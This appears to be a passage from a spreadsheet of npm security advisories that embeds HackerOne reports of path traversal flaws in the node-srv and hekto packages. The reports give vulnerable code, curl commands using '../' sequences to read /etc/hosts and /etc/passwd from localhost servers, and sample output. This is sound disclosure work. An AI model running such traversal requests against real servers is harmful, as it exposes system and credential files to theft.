    &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Server stopped&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run server:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;visit &lt;code&gt;http://127.0.0.1:8080&lt;/code&gt; to verify if everything is fine.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;now, run following &lt;code&gt;curl&lt;/code&gt; command (please adjust numbers of ../ to your system):&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:8080/node_modules/../../../../../etc/hosts
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You should see the content of &lt;code&gt;/etc/hosts&lt;/code&gt; file:&lt;/p&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/357/cc175260921e87d336fdc1722a155babaa20deeb/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIDZ6SZCW6QFSXPOQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDGKMAgCMcLucucN7FCK3A8EtlQd8oHtHMgaq91nd1Z1WlpnlEEYnMAxTgPdeKsZ8r2lH4DQ2RppITH9Ng%2FuIhw1TArVqXh%2BMKAXOhxYg0JzT60r%2FOSTQYY6Y8LHDv9Vvn1R7iuDa7xW475bS4dxTTHGi45W%2F3ilfjnGmfiSSuASv9%2Fe1uiPXT7AmbUydW%2F4JyfFCCF8zjOFxO0AzFpkV7Wo9mSTC09nMqChjDp%2F68ejvWxlGs6yULXCa%2BDuhfTfwoWJ2b6KbvNXuA42BXpCeV2ho6K9U17vi21WlIK5FE55rlolbKIDJlsax4B%2FlhfFynVQ4G920kAC%2FNm%2FT9vI2VGT00DXmxCqayMMiDbvUQysoKbWInBZAq9wb5kE3PlGLlIVHMMFG7zf51G5vPJZZD%2Fh9fUs2Ojd86RfgcyDo2dtVvovgxYZV1BuRT7iPuW4JtKrZ3ZKxOB43oLWocEZlb674aMg0rSphJyn72H%2FRSBl2QxrLrLHfoKeS3gfDtjBN99UgzZ3r2MpIREF%2BcGLxImvwmf6borAnmzm81gyIu0D%2Fr80sGFtH705h2r0m9xAkUVUb571Wx%2FIC7HYxAClLbhrNPkbQrKsot6Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9752f3974990b07ab6e06d3583b68c124c7c647ce6dbab5437c96d1a54d8c185" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/357/cc175260921e87d336fdc1722a155babaa20deeb/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIDZ6SZCW6QFSXPOQ%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075036Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDGKMAgCMcLucucN7FCK3A8EtlQd8oHtHMgaq91nd1Z1WlpnlEEYnMAxTgPdeKsZ8r2lH4DQ2RppITH9Ng%2FuIhw1TArVqXh%2BMKAXOhxYg0JzT60r%2FOSTQYY6Y8LHDv9Vvn1R7iuDa7xW475bS4dxTTHGi45W%2F3ilfjnGmfiSSuASv9%2Fe1uiPXT7AmbUydW%2F4JyfFCCF8zjOFxO0AzFpkV7Wo9mSTC09nMqChjDp%2F68ejvWxlGs6yULXCa%2BDuhfTfwoWJ2b6KbvNXuA42BXpCeV2ho6K9U17vi21WlIK5FE55rlolbKIDJlsax4B%2FlhfFynVQ4G920kAC%2FNm%2FT9vI2VGT00DXmxCqayMMiDbvUQysoKbWInBZAq9wb5kE3PlGLlIVHMMFG7zf51G5vPJZZD%2Fh9fUs2Ojd86RfgcyDo2dtVvovgxYZV1BuRT7iPuW4JtKrZ3ZKxOB43oLWocEZlb674aMg0rSphJyn72H%2FRSBl2QxrLrLHfoKeS3gfDtjBN99UgzZ3r2MpIREF%2BcGLxImvwmf6borAnmzm81gyIu0D%2Fr80sGFtH705h2r0m9xAkUVUb571Wx%2FIC7HYxAClLbhrNPkbQrKsot6Hs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=9752f3974990b07ab6e06d3583b68c124c7c647ce6dbab5437c96d1a54d8c185" class="markdown-inline-image"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem is that url read from the user is not sanitize in any way against classic &lt;code&gt;../&lt;/code&gt; path traversal payload:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Promise&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_this&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;resolve&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;reject&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;uri&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
          &lt;span class="nx"&gt;uri&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
          &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;resolve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;uri&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
      &lt;span class="p"&gt;})(&lt;/span&gt;&lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;)).&lt;/span&gt;&lt;span class="nx"&gt;then&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_this&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
          &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;pathname&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
          &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="sr"&gt;$/&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;_this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;index&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
          &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/^&lt;/span&gt;&lt;span class="se"&gt;\/&lt;/span&gt;&lt;span class="sr"&gt;/&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
          &lt;span class="nx"&gt;filePath&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;resolve&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="nx"&gt;_this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;options&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;root&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;./&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
          &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;_this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;processRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;filePath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration I&amp;#39;ve used to find this vulnerability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS HighSierra 10.13.3&lt;/li&gt;
&lt;li&gt;node 8.9.3&lt;/li&gt;
&lt;li&gt;npm 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;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&lt;p&gt;This vulnerability allows malicious user to read content of any file on the server, which leads to data breach or other attacks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-25T20:00:51.494Z</t>
  </si>
  <si>
    <t>2018-03-07T15:33:00.365Z</t>
  </si>
  <si>
    <t>This vulnerability allows malicious user to read content of any file on the server, which leads to data breach or other attacks.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  node srv contains Path Traversal vulnerability, allows malicious user read content file known path.  Module    Simple static server. Supports Heroku https //www.npmjs.com/package/node srv  Description  node srv does not sanitize path correct way, so curl used retrieve content file remote server.  Steps Reproduce    install node srv   $ npm install node srv   create simple server   //Require module  var Server = require("node srv");  // Start server  var srv = new Server({     port  8080,     root  "./",     logs  true }, function () {     console.log("Server stopped"); });   run server   $ node   visit http //127.0.0.1 8080 verify everything fine. now, run following curl command (please adjust numbers ../ system)   $ curl  v   path http //127.0.0.1 8080/node_modules/../../../../../etc/hosts  content /etc/hosts file     problem url read user not sanitize against classic ../ path traversal payload  return new Promise((function(_this) {         return function(resolve, reject) {           var uri;           uri = url.parse(req.url);           return resolve(uri.pathname);         };       })(this)).then((function(_this) {         return function(pathname) {           filePath = pathname;           filePath = filePath.replace(/ /$/, Â« Â»/Â« Â» + _this.options.index);           filePath = filePath.replace(/^ //, Â« Â»Â« Â»);           filePath = path.resolve(process.cwd(), _this.options.root || "./", filePath);           return _this.processRequest(res, filePath);         };  Supporting Material/References   Configuration I"ve used find vulnerability    macOS HighSierra 10.13.3 node 8.9.3 npm 5.5.1 curl 7.54.0   Wrap  hope report will help keep Node ecosystem safe. questions details finding, please let know comment.  Thank  Regards,  Rafal "bl4de" Janicki  Impact  vulnerability allows malicious user read content file server, leads data breach attacks. </t>
  </si>
  <si>
    <t>vulnerability allows malicious user read content file server, leads data breach attacks.</t>
  </si>
  <si>
    <t>/advisories/587</t>
  </si>
  <si>
    <t>2018-04-24T22:37:51.098+00:00</t>
  </si>
  <si>
    <t>mrk.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mrk.js</t>
  </si>
  <si>
    <t>&lt;2.0.1</t>
  </si>
  <si>
    <t>&gt;=2.0.1</t>
  </si>
  <si>
    <t>[hekto] Path Traversal vulnerability allows to read content of arbitrary files</t>
  </si>
  <si>
    <t>/advisories/586</t>
  </si>
  <si>
    <t>2018-04-24T22:34:28.277+00:00</t>
  </si>
  <si>
    <t>&lt;0.2.3</t>
  </si>
  <si>
    <t>&gt;=0.2.3</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/311218.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;There is Path Traversal vulnerability in hekto module, which allows to read arbitrary file from the remote server.&lt;/p&gt;
&lt;h2 id="module"&gt;Module&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;hekto&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This package exposes a directory and its children to create, read, update, and delete operations over http.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/hekto" href="/redirect?signature=d044cc52c72cc4142cca2ddac26ac456b1dd82ae&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fhekto" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/hekto&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;version: 0.2.0&lt;/p&gt;
&lt;p&gt;Stats&lt;br&gt;
0 downloads in the last day&lt;br&gt;
7 downloads in the last week&lt;br&gt;
36 downloads in the last month&lt;/p&gt;
&lt;p&gt;~420 estimated downloads per year&lt;/p&gt;
&lt;h2 id="description"&gt;Description&lt;/h2&gt;
&lt;p&gt;This vulnerability exists, because there is no sanitization of path of requested file. In line 80 (index.js) &lt;code&gt;file&lt;/code&gt; is set:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/hekto/bin/hekto.js line 80:&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;process&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cwd&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt; &lt;span class="nx"&gt;argDir&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then, this variable is used &amp;quot;as is&amp;quot; in code which reads file from the server:&lt;/p&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// node_modules/hekto/bin/hekto.js line 126:&lt;/span&gt;
    &lt;span class="c1"&gt;// if `file` is a file&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;lstatSync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;isFile&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;extname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;.html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;text/html&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createReadStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;extname&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;.css&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;text/css&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createReadStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;fileBuffer&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;readChunk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sync&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;mime&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fileType&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;fileBuffer&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;mime&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;mime&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mime&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;; charset=utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;text/plain; charset=utf-8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
            &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;fs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;createReadStream&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;hekto&lt;/code&gt; module&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install hekto
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run server from command line:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ ./node_modules/hekto/bin/hekto.js serve
Serving on port 3000
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;use following command to confirm the vulnerability (pelase adjust number of ../ to reflect your system):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ curl -v --path-as-is http://127.0.0.1:3000/../../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result:&lt;/p&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 3000 (#0)
&amp;gt; GET /../../../../../etc/passwd HTTP/1.1
&amp;gt; Host: 127.0.0.1:3000
&amp;gt; User-Agent: curl/7.54.0
&amp;gt; Accept: */*
&amp;gt;
&amp;lt; HTTP/1.1 200 OK
&amp;lt; Vary: Accept-Encoding
&amp;lt; X-Powered-By: Hekto
&amp;lt; Content-Type: text/plain; charset=utf-8
&amp;lt; Date: Wed, 31 Jan 2018 23:08:42 GMT
&amp;lt; Connection: keep-alive
&amp;lt; Transfer-Encoding: chunked
&amp;lt;
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
(...)
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;p&gt;Configuration:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;macOS 10.13.3&lt;/li&gt;
&lt;li&gt;Chromium 66.0.3331.0 (Developer Build) (64-bit) &lt;/li&gt;
&lt;li&gt;Node.js version: v8.9.3&lt;/li&gt;
&lt;li&gt;npm version: 5.5.1&lt;/li&gt;
&lt;li&gt;curl 7.54.0&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please feel free to invite module maintainer to this report. I haven&amp;#39;t contacted maintainer as I want to keep the process of fixing and disclosing bug consistent through HackerOne platform only.&lt;/p&gt;
&lt;p&gt;I hope my report will help to keep Node.js ecosystem and its users safe in the future.&lt;/p&gt;
&lt;p&gt;Regards,&lt;/p&gt;
&lt;p&gt;Rafal &amp;#39;bl4de&amp;#39; Janicki&lt;/p&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;This vulnerability can be used to read content of any file from remote server where hekto is run.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-01-31T23:18:19.644Z</t>
  </si>
  <si>
    <t>2018-02-26T22:10:49.295Z</t>
  </si>
  <si>
    <t>This vulnerability can be used to read content of any file from remote server where hekto is run.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  Path Traversal vulnerability hekto module, allows read arbitrary file remote server.  Module  hekto  package exposes directory its children create, read, update, delete operations http.  https //www.npmjs.com/package/hekto  version  0.2.0  Stats 0 downloads last day 7 downloads last week 36 downloads last month  ~420 estimated downloads per year  Description  vulnerability exists, no sanitization path requested file. line 80 (index.js) file set  // node_modules/hekto/bin/hekto.js line 80      let file = path.join(process.cwd(), argDir, this.request.url);  Then, variable used Â« Â»as isÂ« Â» code reads file server  // node_modules/hekto/bin/hekto.js line 126       // `file` file     (fs.lstatSync(file).isFile()) {         = 200;          (path.extname(file) == ".html") {             = "text/html";             = fs.createReadStream(file);         } else (path.extname(file) == ".css") {             = "text/css";             = fs.createReadStream(file);         } else {             const fileBuffer = readChunk.sync(file, 0, 4100);             const mime = fileType(fileBuffer);              (mime) {                 = + "; charset=utf 8";             } else {                 = "text/plain; charset=utf 8";             }              = fs.createReadStream(file);         }     }  Steps Reproduce    install hekto module  $ npm install hekto   run server command line   $ ./node_modules/hekto/bin/hekto.js serve  Serving port 3000    use following command confirm vulnerability (pelase adjust number ../ reflect system)   $ curl  v   path http //127.0.0.1 3000/../../../../../etc/passwd  Result  *   Trying 127.0.0.1... * TCP_NODELAY set * Connected (127.0.0.1) port 3000 (#0)   /../../../../../etc/passwd HTTP/1.1   Host  3000   User Agent  curl/7.54.0   Accept  */*   &lt; HTTP/1.1 200 OK &lt; Vary  Accept Encoding &lt; X Powered  Hekto &lt; Content Type  text/plain; charset=utf 8 &lt; Date  Wed, 31 Jan 2018 23 08 42 GMT &lt; Connection  keep alive &lt; Transfer Encoding  chunked &lt; ## # User Database # # Note file consulted directly when system running # single user mode.  times information provided # Open Directory. # # opendirectoryd(8) man page additional information # Open Directory. ## nobody *  2  2 Unprivileged User /var/empty /usr/bin/false root * 0 0 System Administrator /var/root /bin/sh (...)  Supporting Material/References   Configuration    macOS 10.13.3 Chromium 66.0.3331.0 (Developer Build) (64 bit)  version  v8.9.3 npm version  5.5.1 curl 7.54.0   Please feel free invite module maintainer report. haven"t contacted maintainer want keep process fixing disclosing bug consistent HackerOne platform only.  hope report will help keep ecosystem its users safe future.  Regards,  